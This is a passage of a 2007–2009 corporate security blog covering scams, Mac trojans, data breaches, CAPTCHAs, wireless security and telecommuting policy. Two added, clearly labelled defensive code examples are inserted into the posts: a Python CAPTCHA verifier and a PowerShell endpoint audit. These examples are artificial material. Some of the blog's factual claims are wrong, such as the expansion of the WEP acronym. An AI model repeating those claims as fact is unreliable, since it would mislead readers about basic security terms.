These newly unemployed job seekers are now prime targets for cyber crime.  Whether it be stock pump and dump scams, fraudulent IRS refunds, phony job announcements (work at home opportunities appearing to come from monster.com?), or "make a quick buck" schemes, people in vulnerable positions are frequently the most likely victims of criminal activity.  As such, it is important for everyone to be more diligent than ever in trying to separate the wheat from the chaff as it relates to any kind of "too good to be true" offer.  Good social engineering preys on weaknesses and stresses a potential victim's urge to "act now".  During times of unemployment or uncertainty your inherent ability to judge is clouded and irrational decisions are often made resulting in more complicated problems.  Be educated, be aware, and be diligent.  Don't be a victim.
Posted by smasiello at 4:24 PM | Link | 0 comments

New Mac Trojan Variant


Following on the heels of last week's announcement of a trojan horse being installed as part of some pirated copies of iWork '09 for the Mac being distributed on peer-to-peer file sharing services comes another announcement that a trojan has also been identified in pirated versions of Adobe Photoshop CS4 for the Mac.

No word yet on whether the new Photoshop trojan was created by the same people who created the iWork trojan that was used to launch DDoS attacks. 

It is important to note that these trojans do not attempt to infect other computers; rather, they stay resident on the local machine.  Since the trojans run as root, it is possible that once they have been installed they could be used to affect other applications.  Since these trojans also have a phone home component, they could (not confirmed) be used for information theft as well.

Trojans being distributed via applications shared through peer-to-peer file sharing services are nothing new in the PC world, but have recently been garnering more attention for Macs as Apple's computers have been gaining market share.  The Mac fallacy of invulnerability is being challenged more frequently now.  It looks like Apple has finally gained enough penetration into the computer market that cyber criminals are targeting them and their users with more regularity.  This is a trend that will certainly continue especially if you consider the number of Mac users who have resisted purchasing security software in the past.
Posted by smasiello at 11:25 AM | Link | 1 comment
12 January 2009

Security Spending Expected to Increase in 2009


Recently, SC Magazine posted an article that quotes a report by Forrester Research which claims that security spending will be higher for both SMBs and Enterprises in 2009.  This makes sense to me.

As businesses are looking for ways to cut costs across every department, security remains one of, if not the most, important IT matters they still need to be sure is addressed over the course of 2009.  As such, matters like inbound spam, viruses, application level intrusions, data leakage protection, web threats, archiving, and compliance will still need to receive top priority, as cyber criminals are not feeling the same effects of a downturned economy as everyone else is.  Their efforts will not be slowed, which means that businesses of all sizes need to be as diligent as ever.  Organizations are looking to outsource some of their daily tasks that are outside their core competencies so that they can refocus their IT resources towards the company's business objectives, typically at less cost and more effectively than can be accomplished internally.

2009 will certainly be an interesting and exciting year for security as network and application threats become more undetectable and uncleanable by existing technologies and businesses look for ways to protect their intellectual property.  The definition of the "network endpoint" has become more and more unclear with mobile and social networking technologies becoming the norm rather than the exception.  This creates a large burden as companies try to come to grips with how much of their confidential, proprietary information is floating around freely on the web.  As such, IT security spending will be a more prominent budget line item than in years past.  If it isn't, then a company's level of risk increases exponentially.
Posted by smasiello at 2:13 PM | Link | 0 comments
05 January 2009

Lance Winslow Post Follow Up


I wanted to take a few minutes and post a follow up to my blog the other day about an article written by Lance Winslow that was originally written in 2005 and reposted here by ezinearticles.com with the date of December 31, 2008 making it appear as if the content was written recently by Lance. 

Businesses do have a lot of choices when making decisions about protecting their network infrastructures.  They can choose to do it in-house using a number of open source solutions or commercial desktop software.  They can also purchase a network based appliance, which also typically has to be maintained in-house, or businesses can look to in-the-cloud solutions using a Managed Service like MX Logic (I'll reiterate my partiality to Managed Services :) ).  No matter which type of solution you prefer for your organization, most all are effective at stopping spam.  Some of the bigger questions that must be answered by any company when making these decisions are how much control they want to have, how much risk they deem to be acceptable in the event of a large outbreak from a bandwidth perspective, and what they want their internal resource allocation to be for managing these solutions.

Overall, spam rates are still down about 45% from their most recent peak in August to now as a result of the McColo shutdown.  Despite the movement to the web as a primary malware delivery vehicle, and with occasional peaks and valleys in mail flow over short periods of time, spam volumes historically continue to increase and will continue to do so.  The biggest reason for these historical increases is improved attack precision (i.e. more targeted attacks and fewer en masse spam campaigns) and refined social engineering which dupe users into opening attachments and visiting web sites that enlist their PC into botnets.

I do agree with Lance's point with respect to the efforts already put forth by the FTC as being largely fruitless.  There have been few arrests since CAN-SPAM went into effect 5 years ago.  At the end of the day, spammers are criminals and should be arrested, but cooperation is needed by many others outside of law enforcement like the upstream bandwidth providers and domain registrars if we are really to make a dent in the spam problem.

At the end of the day, whether spam volumes are up or down, cyber crime is both a criminal as well as a social problem.  I think the criminal part is pretty self-explanatory, but what drives people to cyber crime?  Money.  Lots of it.  With the relatively few arrests that have been made in comparison to the number of spammers trying to fill our inboxes on an everyday basis, cyber crime is considered to be a low risk, high reward venture.  Considering the difficult economic times we are now in the middle of, where companies are tightening their belts as much as possible and unemployment is rising on a daily basis, it would not be surprising if you see more people getting involved in cyber crime activities.

So, to come back to my original point before going on a bit of a tangent: Is an article written back in 2005 about spam volumes, tactics, and defenses entirely relevant today?  I would say both yes and no.  Although tactics have evolved and businesses are feeling more and more pressure every day to find ways to keep their mail servers online and prevent confidential data from leaking out of their networks, there are a lot of options available.  Businesses need to evaluate which type of solution provides them with the options and features that best suit their business and compliance needs.


Posted by smasiello at 2:51 PM | Link | 1 comment
22 December 2008

What Looms Ahead for Cyber Security Under Obama?


According to this RWW (Read Write Web) article posted on Saturday, a recent cyber war simulation revealed that the United States is not equipped to handle a major attack against its computer networks. 

This news is not new. 

Other articles have been published (example from Signal Online here) about the vulnerability of the United States to a cyberterrorism attack, but we are not alone. 

Be sure to understand that this is potentially not just a United States issue; it could be a world-wide issue.  South-East Asia is vulnerable according to this article from DarkNet.  Microsoft claims that Europe is also a likely target for attack.  Siliconindia.com wrote last Thursday that India is also vulnerable to cyberterrorism.  Many other countries surely are as well.

If such an attack were to happen (and to be honest, I am not entirely convinced that this would actually happen, but I am certainly not discounting the need for increased security awareness regardless of its potential effects either) on any of the major economies, its effects would be experienced at a global level. 

One of the many items that Obama is being pressed on as he puts together his new administration is the creation of a National Office for Cyberspace that is headed by a new Cybersecurity Czar.  I believe that this is a good idea if the right appointment is made, but neither that person nor the Cyberspace Office can act in a silo.  They need to coordinate with other nations and create uniformity in establishing policies and procedures.  An obvious question that then arises out of all of this is "Are the policies enacted by the National Office for Cyberspace going to be compulsory for Government Agencies or on the Finance, Telecom, and Energy industries only?"  Secondarily, if these policies will also be required for small businesses and enterprises, what will be the cost to them? 

The RWW article also asks the question on whether or not the White House is the right entity to be coordinating this effort for the United States.  A good question considering their track record in addressing issues like spam via the CAN-SPAM act, which just celebrated its fifth birthday.  Despite that negative mark though, I'll ask the question for discussion as to who else could coordinate this effort and achieve the necessary involvement from the EU, India, South-East Asia, et al?  If there is such a group, let them step forward.

There are clearly a lot of questions that are as of yet unanswered and likely will not be answered for the foreseeable future.  Here's to hoping that the Obama administration will be taking the cybersecurity initiative as a whole (not just from the cyberterrorism angle) seriously and that he also solicits the opinions and ideas of the security industry when making any decisions.  We have a lot of ideas and recommendations that should be seriously considered.
Posted by smasiello at 10:33 AM | Link | 0 comments
02 December 2008

Apple Recommends Using Antivirus Software


It looks like Apple has finally changed their tune as it relates to using security software on their PCs and is now telling their users to make sure they have antivirus software installed.  See article here.

This move was inevitable.  At some point Macs would gain enough market share for them to become more of a target for hackers and cyber criminals.  Most security researchers have been saying that for a long time, and I applaud Apple for finally coming to that realization also, even though it really should have been said some time ago.  Now the Mac users who have long been saying that they don't need to worry about malware "because they run a Mac" really don't have a leg to stand on as even the manufacturer of their computer has come out and contradicted that claim.

From a timing perspective this announcement comes at a good time as well.  As IT managers are working on their 2009 budgets, this is now something that they need to include as another line item to allocate money for early in the year.  If your Mac does not already have some kind of antivirus software installed, the time is now to get it.  Apple's personal computer market share continues to increase which means its prevalence as a target will also continue to rise.  Don't be left holding the bag either as a personal Mac user or as a corporate user.  Macbots are coming.  iPhones and iPods will not be far behind.

*** UPDATE 12/2/2008 4:42pm MST ***  So it looks like I need to recant a little bit.  If you look at Apple Knowledge Base Article 4454, you notice the last updated date of December 2, 2008.  This article was originally published back on June 8, 2007.  Unfortunately, the existence of this article hasn't changed most Mac user hubris in their invulnerability to malware because the fact of the matter remains that many Mac users still don't use antivirus software on their machines.  The time is still now to change that.  A widespread Mac virus could be a devastating event!
Posted by smasiello at 8:43 AM | Link | 5 comments
01 December 2008

Cyber Monday - The Official Online Kickoff to the Holiday Shopping Season


Happy "Cyber Monday" - what is widely considered to be the official start of the online shopping season.  After eating too much turkey, gravy, mashed potatoes, and stuffing on Thursday (and probably Friday, Saturday, and Sunday too!), then spending way too much time in line for Black Friday shopping deals that probably weren't worth getting up at 3am for, today is the first day back at work after the long holiday weekend.  As such, today is also the day that many people start buying presents online.

According to comScore, spending on Cyber Monday has historically reflected overall holiday season spending.  The question that I have, though, is "Is Cyber Monday relevant anymore?"  Many retailers now offer the option, even on Black Friday, to order items via their web site to get the same deals.  So, many of the specials that people were standing in line for on Friday could have been purchased online, at home, in your pajamas.

From a security perspective, Cyber Monday is the start of a season where we attempt to educate users as much as possible as it relates to being aware of the "too good to be true" deals that may arrive in your inbox and have typically offered a couple of pointers to keep yourself safe online:

-- Shop only with vendors that you already know and trust.  Don't give your credit card information away to someone that you don't already have some kind of pre-existing shopping relationship with. 

-- Avoid clicking on what appear to be links to legitimate web sites in an email or IM.  If you want to go to the Land's End web site to shop, go to the URL directly.  The link may actually go to a look-alike site setup solely to steal information.
-- Ensure that web sites that are accepting credit card information and/or that you have to log into have SSL encryption on the pages that are processing this data.  This should be a given and a standard nowadays, but the lack of existence of encryption of your sensitive data should be your first red flag that your business should likely be taken elsewhere.

-- Look for seals from privacy enforcement organizations like TrustE and BBBOnline.  Although this isn't a guarantee that their site cannot be compromised, cooperation with these organizations means that they do not ask for sensitive information like social security number without explicitly explaining in their Privacy Policy why they are collecting it.  So you can at least be certain going in why you are being asked for something that you wouldn't normally provide.  You can then make an informed decision as to whether you want to take your business to another merchant.

These tips are not just important for Cyber Monday though.  They are relevant to the entire holiday season and for the entire year.  Sometimes with the rush and hurry to find the best deals for that must-have gift we let our guards down or think that it is too inconvenient to go through some of these extra steps.  The question then comes down to, whether you want to take a few extra minutes to make educated decisions about who you are giving your credit card data to now or risk spending a lot more time trying to clean up an avoidable mess later.

Here's to a fun, safe, and secure holiday season.  Cheers! :)

Posted by smasiello at 11:04 AM | Link | 3 comments
27 August 2008

Keylogger Infects Laptops Used on Space Station


According to this story posted on Wired yesterday, a keylogger has been found on laptops being used in the space station.  The reported malware, W32.Gammima.AG (see here for description on Symantec's web site), has been around since August 2007 and steals passwords from a few (rather obscure here in the United States) online games.

You are thinking "So what?  What risk does an online game keylogger pose to a laptop on the space station?  Why should I care?"

As you know, we like to think bigger picture here.

Let's start with the obvious question of why the anti-virus software running on the laptop didn't immediately identify and stop a one year old virus.  I don't know about you, but that sends up lots of red flags to me!  This obviously begs the question of how long this keylogger has actually been resident on the laptop and whether there are other, yet undetected, rootkits and keyloggers on those machines.  Also, what other computers were potentially exposed to these infected machines that this virus could have propagated to?  What information has been exposed to theft or compromise either from the laptops or from other exposed machines on the NASA network?  What was done with these laptops once the virus was detected?  Were they merely cleaned to the virus scanner's standards (which clearly aren't that high!) or was the computer completely taken out of commission so that it could be wiped to Department of Defense specifications and re-imaged before it was redeployed?
Obviously there are a lot of unanswered questions in relation to this story, and of course NASA will never make the answers to those questions public, but this certainly calls into question the validity of the security measures employed by one of the most important programs of the 20th and 21st centuries.  Where else within the federal government does the potential for similar security breaches exist?   Are potential data leakages like this something that the Department of Homeland Security is focused on preventing?  If not, they should be!  Let's be sure we aren't aiding and abetting the bad guys by giving them the exact information we are looking to protect!

Posted by smasiello at 2:22 PM | Link | 1 comment
05 August 2008

Perspective is Good. Being Proactive is Better


According to this story, a laptop that contained approximately 33,000 records of customers of the Clear system was lost (Clear is a for-pay system that allows customers to go through a separate security line at some airports using a smartcard).

Apparently the laptop has been found....in the same room that it was allegedly lost in.  The title of the article linked to above is "Laptop Discovery May End SFO Security Scare"....I couldn't disagree more.

If someone unauthorized had access to the room that the laptop was in when it disappeared, that same person had access to put the computer back after they were done with it (stealing data, installing a trojan to steal more data...the list goes on).  According to the story customer data on this laptop was NOT encrypted which means anyone who had access to the computer had unfettered access to all of the customer information stored on it which included names, addresses, birth dates, driver license numbers, and passport numbers.  Of course, now the TSA is saying that the computers must use encryption, but that is like buying flood insurance while your basement is under 8 feet of water.  Too little, too late.

This is a huge black eye for Verified Identity Pass, the company that operates the Clear program.  My favorite line in the article is where their CEO Steven Brill states "We don't believe the security or privacy of these would-be members will be compromised in any way."  The fact that their CEO would make a statement like that just underscores what little he and his company understand about security and the protection of customer information. 
Hopefully this will prompt the TSA into doing a more security oriented deep dive on all of their vendors.  It is important for them to know just how many other vendors either currently have, or are headed for, 8 feet of water in their respective basements.  As a member of the DHS, the TSA already doesn't have a very good record as it relates to security.  Any proactive measures that they can take to ensure the security posture of their organization and the vendors they do business with will help mitigate future high-profile breaches.

Posted by smasiello at 1:29 PM | Link | 0 comments
22 July 2008

Do some CAPTCHAs go too far?

CAPTCHAs - Completely Automated Public Turing test to tell Computers and Humans Apart.

In other words, an attempt at verification that a human is filling out a web form as opposed to an automated agent/bot.

Or, in other other words, a test that has become almost impossible for humans to even pass due to the increased levels of obfuscation being put into the tests themselves.

Usually CAPTCHAs are done via some kind of image where the user types in the contents of said image into a text box at the end of a web form.  If the user's guess is correct, then the form is successfully submitted, and whatever follow up action that is supposed to happen afterward is performed (e.g. successful signup to a mailing list, comment post to a blog, etc).

The problem is that in an effort to make these CAPTCHA images more and more difficult for software to break down to allow bots to bypass them, they have also been made very difficult for humans, those who are supposed to be able to read them, to figure out.
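The mechanics described above (a challenge the human reads from an image, an answer typed into the form, and a server-side check before the signup or comment is accepted) can be shown without any image rendering. The following is an added example, not code from the original post or from Facebook; it shows the verification half of a CAPTCHA as a stateless HMAC token, so the server never has to store the expected answer, and it folds in the usability point of the post by accepting the answer case-insensitively. `SERVER_KEY`, the 300-second lifetime and the six-character alphabet are assumptions chosen for the example.

```python
"""Stateless CAPTCHA issue/verify with an HMAC token.

Added example, not part of the original post.  The server renders
`answer` into an image and embeds only `token` in the form; on submit,
it recomputes the tag from what the human typed and compares.
"""
import hashlib
import hmac
import secrets
import string
import time

SERVER_KEY = secrets.token_bytes(32)   # assumption: per-process secret; load from config in practice
ALPHABET = string.ascii_lowercase + string.digits
CHALLENGE_LEN = 6                      # assumption
TTL_SECONDS = 300                      # assumption: challenge lifetime


def _tag(answer, nonce, expires, key):
    """HMAC over nonce, expiry and the normalized answer.  Normalizing to
    lower case means a human who reads 'Mountains' as 'mountains' still passes."""
    msg = f"{nonce}|{expires}|{answer.strip().lower()}".encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


def issue_challenge(now=None, key=SERVER_KEY):
    """Return (answer, token).  `answer` goes into the image; `token`
    goes into a hidden form field.  Nothing is stored server-side."""
    now = int(time.time()) if now is None else now
    answer = "".join(secrets.choice(ALPHABET) for _ in range(CHALLENGE_LEN))
    nonce = secrets.token_hex(8)
    expires = now + TTL_SECONDS
    token = f"{nonce}.{expires}.{_tag(answer, nonce, expires, key)}"
    return answer, token


def verify_response(user_input, token, now=None, key=SERVER_KEY, used=None):
    """True iff the typed answer matches the token, the token is unexpired,
    and (when `used` is given) the nonce has not been consumed before.
    A bot holding the token cannot check guesses offline: the tag depends
    on the server key, so every guess costs a round trip."""
    now = int(time.time()) if now is None else now
    try:
        nonce, expires_s, tag = token.split(".")
        expires = int(expires_s)
    except ValueError:
        return False                      # malformed token
    if now > expires:
        return False                      # stale challenge
    if used is not None and nonce in used:
        return False                      # replay of an already-solved challenge
    expected = _tag(user_input, nonce, expires, key)
    if not hmac.compare_digest(expected, tag):
        return False                      # wrong answer (constant-time compare)
    if used is not None:
        used.add(nonce)                   # consume the nonce on success only
    return True


if __name__ == "__main__":
    answer, token = issue_challenge()
    print("render into image:", answer)
    print("accepted:", verify_response(answer.upper(), token, used=set()))
```

The `used` set is the one piece of server state the design needs; without it a solved token could be submitted repeatedly, which is exactly the bot behaviour the test is meant to stop.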

Take the following image that I was presented with on Facebook, a popular social networking site, this morning:


Are you kidding me?

Obviously the second word is "mountains", but I challenge even the most competent forensic experts to tell me what the first word is supposed to be.

Despite its fallibilities, I can understand as a technical person the need to have technologies like this in place.  As a technical community, we need to make sure that we aren't making our products and systems impossible to use "in the name of security."  Users will only accept a certain amount of inconvenience before they go find solutions that are simpler to use while still providing acceptable levels of security.

Posted by smasiello at 4:05 PM | Link | 2 comments
06 May 2008

Peter Gabriel's Web Server Stolen


According to Peter Gabriel's web site sometime on Sunday Night or Monday Morning their web servers were stolen from their data center. 

I wonder if they broke in with a Sledgehammer?  Or if they were Quiet and Alone?  I wonder if the RIAA will sue the thieves for stealing music?

Ok, enough jokes....

Kind of makes you wonder how they got in....or does it?  I've been speaking to several colleagues lately who either currently perform social engineering engagements or did them in previous lives, and it is amazing to me the areas of buildings that they have been able to access and the confidential information that they have uncovered just by everyday, common techniques that we all do: tailgating, acting like you misplaced your access badge, or just looking like you belong somewhere.

Then once they were in the data center, how did they access the cabinet that the servers were in?  Many cabinets go from the floor to the ceiling or have safeguards in place to prevent the cabinet from being compromised from on top.  They should also have at minimum either a keylock or combination lock (or both), not to mention that the data center should also have security cameras covering every square inch of floor space. 

We talk about proofs of concept very frequently where the occurrence of one crime is a finger pointing towards the potential occurrence of something much more damaging.  This is definitely one of those types of crimes.  If it can happen at this data center, what is to say that this same thing couldn't happen at any number of others as well?  What security policies does your data center have?  How well do they follow them?

We make a lot of assumptions with regards to the security of data centers, but all the technology controls in the world don't make a bit of difference if they can easily be bypassed.

Posted by smasiello at 12:48 PM | Link | 0 comments
23 April 2008

Telecommuters Surf Twice as Much Porn


According to this article posted at PC Pro, ScanSafe says that remote employees are more than twice as likely to be surfing porn as employees who work in the office.

This is not a surprising stat, as telecommuting takes a level of discipline on the part of the teleworker that is far and away greater than that required of office-bound employees.  What is surprising to me is that companies are ALLOWING this type of web surfing to take place on their corporate computers!

Porn sites are one of the biggest security risks out there.  Porn sites commonly install malware, adware, tracking cookies, and other security risks that could cause a security breach in your organization.

In most cases you want to use technology as an enabler for employees to be as efficient as possible, particularly your remote employees, who are frequently less scrutinized because most of management's attention is focused on the employees who are in the office every day.  This, however, is one of those instances where technology needs to enforce the policies of the organization so that the company can protect itself and its intellectual property from compromise and disclosure.  Data leakage as a result of inappropriate employee web surfing and irresponsible organizational content filtering policies is one of the easiest insider threats to mitigate.  Companies should be doing everything they can to ensure that this is not an avenue of information disclosure.

Posted by smasiello at 3:46 PM | Link | 0 comments
19 March 2008

Does it Cost Extra for the iPod Without Malware?


Whether it is iPods being shipped with malware, digital picture frames, navigation systems, or hard drives, the number of incidents of electronic equipment being shipped from the manufacturer with malware is disturbing!

How does this happen?  This is typically a by-product of PCs that are used for things outside their intended business purpose.  For example, if a computer's primary business function is to load software onto a digital picture frame or to test the ability of a computer to connect to and transfer files to the frame, then those should be the only parameters by which that machine is used.  It should not be used to plug in external USB drives, download videos and music off of the internet, or surf porn sites.  Any of these activities are vectors of unnecessary risk and could end up infecting the PC with malware, which will subsequently get passed on to other devices.

As the line between what is known as a PC and what actually runs the same type of software as your PC continues to blur, you can expect to see more of these types of incidents occurring.  This is unfortunate because as we have become more dependent on technology in our everyday lives and as the devices that we use have become more advanced, our level of confidence in those devices to function in a safe, secure, stable manner has declined significantly.  These sorts of compromises represent one of the biggest new threats to corporate networks and will be another one of the avenues used more prevalently by cyber criminals to steal sensitive, confidential, and personal information as malware continues its evolutionary process.

Posted by smasiello at 2:48 PM | Link | 1 comment
06 February 2008

Article Commentary: Human Error the Leading Cause of Security Threats

I ran across this article this morning which states that, according to Deloitte, human error is the leading cause of security threats. I agree with this to a point.

I thought it was important to mention this concept as it is also a major point in the Security Awareness presentations that I do. Where my opinion differs is that I believe that human error is the leading cause of *insider* security threats, but not the leading cause of all security threats.

Perhaps I am being myopic because of the type of company that I work for, but I view intrusion resulting from public server vulnerability, virus infection, and social engineering as a much larger issue.

That isn't, however, to take away from the importance of the insider threat. When I say "insider threat" am I referring to employees who are going out of their way to do something malicious or to try to access data that they know they shouldn't have access to? Yes, but I am also referring to employees who stumble upon information due to lack of proper security controls or the maintenance thereof. For example, if you work in your Customer Support department and happen to stumble upon a spreadsheet named "Executive Salaries 2008.xls" somewhere out on a network share that you had permission to view, would you open it? Perhaps you would report it, but I'll bet you a nickel that you would look at it first, maybe save a copy for yourself, or print it out on the closest printer to show your friends. These are examples of insider threats just as much as the over-eager security novice who is attempting cross-site scripting attacks against your production systems in an attempt to learn.

According to the 2006 E-Crime Watch Survey insiders were responsible for 27% of all security incidents and 55% of respondents reported at least one incident that was the result of insider activity. That's more than 1 in 4 security incidents that happen as a result of an internal employee! That's a lot, especially in an age where most of what you read about in security publications talks about the latest worms, keyloggers, and other maladies looking to steal your financial data.

The article also states that "Another security worry is many line-of-business executives' tendency to see information security as solely IT's problem." If your company puts the responsibility of security solely with the IT department, they are missing the boat. Security should not rest with IT for the same reasons that it should not rest with Production Operations or Quality Assurance or any other department; they have their own agendas and their own core competencies to focus on. Adding "make sure we are secure" to that mix is a certain recipe for failure. Your security program implementation, maintenance, and enforcement should be handled by an independent (could be internal) source whose *main responsibility is the security program*.

The article concludes by making a statement in regards to the implementation of a corporate security program, "A prerequisite for effective information security is the implementation of a proactive information security strategy that is closely linked to the company's overall business strategy, business requirements, and key business drivers." This is completely true. One thing I would add onto it is "...and has the full support of the company's executive team." Without the support of the people who run the company, your program will barely get off the ground.

Posted by smasiello at 10:13 AM | Link | 0 comments
03 January 2008

Have No Fear! Wireless is Secure!

....or so networking equipment vendor 3Com would have you believe.

Today's blog entry is based on an article posted by The Star Online which states that (when comparing the risks associated between wired and wireless networks) "the risks are the same as those posed to wired networks – the typical computer virus infection and odd worm-intrusion incident". Last I checked, worms and viruses, although significant risks in and of themselves, are far from the only risks facing wireless and wired networks. What about the hacker next door who sets up a wireless sniffer to try to crack the encryption key used on your wireless network? Or the one who is just casually looking for completely open wireless networks to attach onto?

The article also states: "What's even more interesting is that some of these organisations did not face any security threats and have found that the security of their networks either improved or remained unchanged when they moved to wireless." This has nothing to do with the deployment of wireless. There are three main encryption technologies used on wireless networks today: WEP (Wired Equivalency Protocol), WPA (Wi-Fi Protected Access), and WPA2 (version 2 of WPA), which itself comes in two versions: WPA2-Personal and WPA2-Enterprise. Nowhere in any of these acronyms is the word "security" used. Why? Because they do not provide "security". They provide encryption (which can be cracked) and some level of access control, but not "security". In this instance, as part of the deployment of wireless to the organization's internal network resources they may have employed some additional safeguards such as requiring authentication to a VPN after a successful wireless connection, but this is an architectural change and is not related to the security of the wireless network.

The article also mentions that consumer-grade wireless networking equipment is less secure than enterprise-grade equipment. Not true. Generally, consumer and enterprise-grade wireless access points support all of the current encryption protocols mentioned above. Unfortunately, not all of the equipment that is connecting to these access points (predominantly laptops) supports these new protocols. This is especially true in organizations that deploy older, bargain-basement laptops whose internal wireless adapters may not even support encryption beyond basic WEP. Nevertheless, this is not a factor of the security of the access point. This is a factor of the capabilities of the machines connecting to the network. The security of the wireless access point itself is not lacking because it is a D-Link you bought for $75 from a local retailer versus a Cisco access point that may have cost several hundred.

Why am I being so hard on this article? Mainly because I keep hearing people trying to make the connection between wireless networks and security. In this case they are trying to make the connection between wireless deployment and _increased_ security! As I mentioned earlier, there are certainly some best practices that you can deploy as an organization if you are looking to go wireless, but again these are not security functions of the wireless network or the wireless network equipment itself, but rather functions of your own architecture and safeguards put into place such that you limit what a potential criminal has access to even if they do manage to successfully get onto your wireless network.

Wireless is a wonderful technology and I am a big proponent of it (I use it all day between work and home), but wireless does not equal security. Please don't confuse the two!

Posted by smasiello at 1:41 PM | Link | 0 comments
17 September 2007

The Risk of Identity Theft

How at risk are you to be a victim of identity theft?

According to the folks over at the Privacy Rights Clearinghouse, approximately 165 million data records of U.S. residents have been exposed due to security breaches since January 2005. In 2007 there have been 278 breaches reported, which account for over 75 million records.

Keep in mind that these numbers are for *reported* breaches by companies who are required to report such incidents. This only represents a small percentage of the number of businesses out there who might have your personally identifiable information.

Even if we take the 165M records number as being accurate, this means that we are all roughly at about a 50% risk of having our identities stolen as a result of these breaches! Granted, the information obtained could vary greatly from a hacker only obtaining your name and email address all the way to exposure of credit card numbers and your social security number. Both types are just as dangerous though. For example, if a hacker only obtains your name and email address they could use that information to send legitimate looking phishing messages to your inbox in an effort to get the rest of what they want.

So, what to do if you believe that your identity might have been stolen? Privacy Rights Clearinghouse has a comprehensive guide posted on their website which discusses not only how to proactively stay on top of your credit (I would also recommend the Identity Theft Resource Center), but also things that you can do to prevent further damage from being done once your information does end up in the wrong hands.

One of the most important things to remember is that just because your data might have been compromised does not mean that you will be a victim of identity theft. Unfortunately, there is little that you can do to prevent this sort of thing from happening, but it is important, however, to remain diligent in order to minimize how it will affect you.

Posted by smasiello at 1:41 PM | Link | 0 comments

Hang On! It's going to be a wild ride!

It's going to be a wild last 3 months of the year for ISPs of all kinds.

Over the last 2-3 months we have seen over a 60% increase in mail traffic (mostly attributed to the Storm Worm and its many variants). Since the Christmas marketing season will soon be upon us I would not be surprised if internet email traffic at least doubled on top of where it is now before the year is out.

If you don't believe that you are equipped to handle this kind of additional load, NOW is the time to act!

Protect your mail infrastructure!

Protect your network!

Most of all, protect your business!

(We now return you to your regularly scheduled programming)

Posted by smasiello at 9:35 AM | Link | 0 comments
29 August 2007

Telecommuting is a safe practice?

Another part of my role here at MX Logic in addition to being in charge of our Threat Research group is that of our security officer. This includes not only security education, but also implementation and enforcement of our internal security policies and procedures.

One of the things that I have been putting a lot of thought into lately is the security implication of telecommuting. Telecommuting is becoming much more commonplace among many different types of organizations now that more and more companies are adopting mobile computing practices. This often comes at the cost of security, however. In an effort to make employees more productive when they are away from the office (either traveling or working from home), the security implications of opening up your network in this way are not always considered...or if they are considered, they are set aside for the trade-off of getting more out of your workforce.

So, what's the big deal? So what if Jane wants to work on her desk PC at home when she telecommutes instead of using her laptop?

There was an article posted recently on darkreading.com that said that 94% of Federal CISOs do not believe that telework/telecommuting programs are a threat to security. It also stated that 83% of Federal CISOs are "interested" in mobile endpoint certification for compliance with the Federal Information Security Management Act. Being interested means that they aren't doing it yet, but think it is a good idea.

These numbers don't add up to me. How can you not be concerned about the security implications of telecommuting, yet at the same time have not even certified that your own equipment is in compliance with your own Information Security Management Act?

Let's discuss some best practices that companies can use when implementing a work from home policy:

-- Set up access control so that only your company-authorized PCs are allowed to connect to your VPN. If Jane has been connecting her work laptop to her own unsecured home wireless network or to the local Starbucks Wi-Fi network, you still can't guarantee that she won't be trying to spread a virus across your corporate infrastructure, but you have more control over this PC than you do over Jane's home PC that she shares with her two teenagers.

-- Implement as many defense-in-depth strategies on your company PCs as possible. This includes at least one anti-virus product and some kind of Host-Based Intrusion Prevention System (HIPS).

-- Disable ports on the PC which allow users to plug in external storage devices like USB drives. Not only are these devices handy if someone wants to steal your corporate secrets off of your corporate intranet, but they are an easy injection point for malware.

-- Turn off the wireless radio when the PC is going to be hard-wired to the network. It will prevent accidental connection to a potentially rogue wireless network. A nice side effect is that it will increase battery life on a single charge as well, since the radio is such a drain on the battery when it is on.
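As an added example (not code from the original post), here is a PowerShell function that audits, and with -Remediate enforces, the USB-storage and wireless-radio items from the list above on a Windows PC. It assumes PowerShell 5 or later with the NetAdapter module (Windows 8 / Server 2012 or newer, so more recent than this post) and an elevated session for remediation; the function name and the "expected Start=4" rule are this example's own.

```powershell
# Added example, not from the original post: audit two of the endpoint
# controls listed above (USB storage disabled, Wi-Fi off while wired).
# Assumes PowerShell 5+ on Windows with the NetAdapter module; fixes need
# an elevated session.

function Test-TeleworkEndpoint {
    [CmdletBinding()]
    param(
        # Pass -Remediate to apply the fixes instead of only reporting.
        [switch]$Remediate
    )

    $findings = @()

    # 1. USB mass storage: a USBSTOR service start type of 4 (Disabled)
    #    stops Windows from loading the driver for USB drives at all.
    $usbKey   = 'HKLM:\SYSTEM\CurrentControlSet\Services\USBSTOR'
    $usbStart = (Get-ItemProperty -Path $usbKey -Name Start).Start
    if ($usbStart -ne 4) {
        $findings += "USB storage driver enabled (USBSTOR Start=$usbStart, expected 4)"
        if ($Remediate) {
            Set-ItemProperty -Path $usbKey -Name Start -Value 4
        }
    }

    # 2. Wireless radio: if a wired adapter is up, any Wi-Fi adapter that is
    #    also up is a finding, since the PC could drift onto a rogue AP.
    $wired = Get-NetAdapter -Physical | Where-Object {
        $_.Status -eq 'Up' -and $_.PhysicalMediaType -eq '802.3'
    }
    $wifi = Get-NetAdapter -Physical | Where-Object {
        $_.Status -eq 'Up' -and $_.PhysicalMediaType -eq 'Native 802.11'
    }
    if ($wired -and $wifi) {
        foreach ($adapter in $wifi) {
            $findings += "Wi-Fi adapter '$($adapter.Name)' is up while a wired link is active"
            if ($Remediate) {
                Disable-NetAdapter -Name $adapter.Name -Confirm:$false
            }
        }
    }

    # An empty list means both controls are in place.
    return $findings
}

# Report-only run; add -Remediate to enforce.
Test-TeleworkEndpoint | ForEach-Object { Write-Warning $_ }
```

Disabling USBSTOR leaves USB keyboards and mice working, since they do not use the mass-storage driver.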

As with anything technology related, technology solutions are only part of the answer. User education is also a large piece of this pie. One of the most important jobs of a security officer is security awareness and making sure that security is part of the consciousness of every employee at an organization. It is one thing to put policies and technology in place which enforce security, but it is another entirely to make sure everyone in your company is also aware of those policies and knows and understands how to follow them. The backend technology should be in place to enforce those policies, but it is the end user's responsibility to try not to put themselves into a vulnerable position, and that is done through education, education, and more education.

Posted by smasiello at 9:58 AM | Link | 1 comment